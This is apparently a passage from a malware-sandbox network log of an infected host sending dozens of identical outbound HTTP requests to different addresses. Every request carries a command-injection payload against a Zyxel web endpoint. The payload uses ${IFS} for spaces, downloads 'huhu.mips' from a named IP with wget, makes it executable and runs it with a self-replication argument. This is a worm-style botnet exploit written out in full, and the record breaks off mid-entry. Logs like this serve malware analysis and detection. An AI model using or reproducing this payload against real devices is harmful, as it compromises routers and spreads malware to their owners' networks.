                                                      3486192.168.2.14516264.89.7.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557600975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3487192.168.2.1437494143.48.106.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557625055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3488192.168.2.143418881.131.214.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557656050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3489192.168.2.145609034.126.137.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557698965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3490192.168.2.1439432204.68.241.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557745934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3491192.168.2.1454566178.130.135.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557795048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3492192.168.2.14337901.251.63.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557840109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3493192.168.2.145661220.232.5.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557876110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3494192.168.2.144942072.187.148.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557920933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3495192.168.2.1441008222.115.207.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.557955027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3496192.168.2.144413891.166.72.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558069944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3497192.168.2.1449446178.91.228.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558109999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3498192.168.2.1439804220.186.91.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558146954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3499192.168.2.144410419.167.132.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558217049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3500192.168.2.146087073.46.31.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558252096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3501192.168.2.1437452174.250.98.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558279037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3502192.168.2.1445340210.152.184.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558320999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3503192.168.2.145767243.119.251.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558345079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3504192.168.2.144470872.155.164.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558379889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3505192.168.2.144394691.101.196.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558419943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3506192.168.2.1456008150.238.201.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558473110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3507192.168.2.1455146102.121.238.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558525085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3508192.168.2.1447814116.23.109.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558540106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3509192.168.2.14546982.229.74.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558598995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3510192.168.2.144339037.112.77.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558640003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3511192.168.2.144684267.54.235.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558686018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3512192.168.2.1441008209.171.217.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558717966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3513192.168.2.143408243.144.1.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558764935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3514192.168.2.145798850.139.224.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558792114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3515192.168.2.145617696.106.228.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558830976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3516192.168.2.1436650180.193.165.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558872938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3517192.168.2.1439908174.230.179.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558904886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3518192.168.2.1443136157.55.233.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558943987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3519192.168.2.1457712160.215.4.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.558974981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3520192.168.2.144497843.91.226.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559020996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3521192.168.2.1452474201.84.37.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559062958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3522192.168.2.145141251.101.54.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559118986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3523192.168.2.1442790221.202.147.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559171915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3524192.168.2.143481847.73.47.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559212923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3525192.168.2.143731299.6.19.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559262991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3526192.168.2.14594888.225.117.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559307098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3527192.168.2.1445888155.57.60.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559336901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3528192.168.2.1438390193.225.226.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559372902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3529192.168.2.145379244.150.120.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559423923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3530192.168.2.1459166141.194.210.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559468985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3531192.168.2.143983866.47.162.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559514999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3532192.168.2.1453790161.6.82.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559554100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3533192.168.2.14338462.244.235.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559586048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3534192.168.2.144601246.139.201.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559614897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3535192.168.2.145992025.232.20.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559662104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3536192.168.2.143540493.168.232.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559694052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3537192.168.2.1445354152.154.63.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559750080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3538192.168.2.145570243.111.41.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559765100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3539192.168.2.1447676159.2.89.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559799910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3540192.168.2.1460432206.187.238.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559860945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3541192.168.2.143714691.105.172.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559892893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3542192.168.2.1456564171.60.5.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559948921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3543192.168.2.1450108203.48.251.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.559998035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3544192.168.2.144614831.8.82.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560023069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3545192.168.2.1456700125.209.83.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560075998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3546192.168.2.144722438.58.133.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560110092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3547192.168.2.1436396188.68.165.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560129881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3548192.168.2.144055866.181.62.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.560179949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3549192.168.2.1441970206.183.119.10443
